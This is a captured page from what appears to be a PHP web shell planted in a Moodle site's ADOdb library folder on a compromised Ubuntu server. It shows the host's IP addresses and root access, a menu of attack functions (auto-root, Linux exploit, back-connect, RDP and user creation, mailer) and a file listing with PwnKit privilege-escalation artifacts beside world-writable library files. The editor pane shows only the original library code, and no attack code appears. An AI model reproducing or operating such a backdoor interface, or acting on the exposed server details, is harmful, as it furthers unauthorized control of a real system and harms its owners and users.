Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
lib /
adodb /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
drivers
[ DIR ]
drwxrwxrwx
lang
[ DIR ]
drwxrwxrwx
perf
[ DIR ]
drwxrwxrwx
xsl
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
adodb-active-record.inc.php
26.13
KB
-rwxrwxrwx
adodb-active-recordx.inc.php
37.81
KB
-rwxrwxrwx
adodb-csvlib.inc.php
8.3
KB
-rwxrwxrwx
adodb-datadict.inc.php
27.63
KB
-rwxrwxrwx
adodb-error.inc.php
8.77
KB
-rwxrwxrwx
adodb-errorhandler.inc.php
2.68
KB
-rwxrwxrwx
adodb-errorpear.inc.php
2.22
KB
-rwxrwxrwx
adodb-exceptions.inc.php
2.16
KB
-rwxrwxrwx
adodb-iterator.inc.php
699
B
-rwxrwxrwx
adodb-lib.inc.php
35.87
KB
-rwxrwxrwx
adodb-memcache.lib.inc.php
4.92
KB
-rwxrwxrwx
adodb-pager.inc.php
7.92
KB
-rwxrwxrwx
adodb-pear.inc.php
9.34
KB
-rwxrwxrwx
adodb-perf.inc.php
31.29
KB
-rwxrwxrwx
adodb-php4.inc.php
317
B
-rwxrwxrwx
adodb-time.inc.php
42.28
KB
-rwxrwxrwx
adodb-xmlschema.inc.php
54.19
KB
-rwxrwxrwx
adodb-xmlschema03.inc.php
61.32
KB
-rwxrwxrwx
adodb.inc.php
123.61
KB
-rwxrwxrwx
index.html
0
B
-rwxrwxrwx
license.txt
25.29
KB
-rwxrwxrwx
pivottable.inc.php
6.13
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
readme.txt
1.67
KB
-rwxrwxrwx
readme_moodle.txt
532
B
-rwxrwxrwx
rsfilter.inc.php
1.47
KB
-rwxrwxrwx
toexport.inc.php
3.29
KB
-rwxrwxrwx
tohtml.inc.php
5.48
KB
-rwxrwxrwx
xmlschema.dtd
1.42
KB
-rwxrwxrwx
xmlschema03.dtd
1.68
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : adodb-exceptions.inc.php
<?php /** * @version V5.18 3 Sep 2012 (c) 2000-2012 John Lim (jlim#natsoft.com). All rights reserved. * Released under both BSD license and Lesser GPL library license. * Whenever there is any discrepancy between the two licenses, * the BSD license will take precedence. * * Set tabs to 4 for best viewing. * * Latest version is available at http://php.weblogs.com * * Exception-handling code using PHP5 exceptions (try-catch-throw). */ if (!defined('ADODB_ERROR_HANDLER_TYPE')) define('ADODB_ERROR_HANDLER_TYPE',E_USER_ERROR); define('ADODB_ERROR_HANDLER','adodb_throw'); class ADODB_Exception extends Exception { var $dbms; var $fn; var $sql = ''; var $params = ''; var $host = ''; var $database = ''; function __construct($dbms, $fn, $errno, $errmsg, $p1, $p2, $thisConnection) { switch($fn) { case 'EXECUTE': $this->sql = $p1; $this->params = $p2; $s = "$dbms error: [$errno: $errmsg] in $fn(\"$p1\")\n"; break; case 'PCONNECT': case 'CONNECT': $user = $thisConnection->user; $s = "$dbms error: [$errno: $errmsg] in $fn($p1, '$user', '****', $p2)\n"; break; default: $s = "$dbms error: [$errno: $errmsg] in $fn($p1, $p2)\n"; break; } $this->dbms = $dbms; if ($thisConnection) { $this->host = $thisConnection->host; $this->database = $thisConnection->database; } $this->fn = $fn; $this->msg = $errmsg; if (!is_numeric($errno)) $errno = -1; parent::__construct($s,$errno); } } /** * Default Error Handler. This will be called with the following params * * @param $dbms the RDBMS you are connecting to * @param $fn the name of the calling function (in uppercase) * @param $errno the native error number from the database * @param $errmsg the native error msg from the database * @param $p1 $fn specific parameter - see below * @param $P2 $fn specific parameter - see below */ function adodb_throw($dbms, $fn, $errno, $errmsg, $p1, $p2, $thisConnection) { global $ADODB_EXCEPTION; if (error_reporting() == 0) return; // obey @ protocol if (is_string($ADODB_EXCEPTION)) $errfn = $ADODB_EXCEPTION; else $errfn = 'ADODB_EXCEPTION'; throw new $errfn($dbms, $fn, $errno, $errmsg, $p1, $p2, $thisConnection); } ?>
Close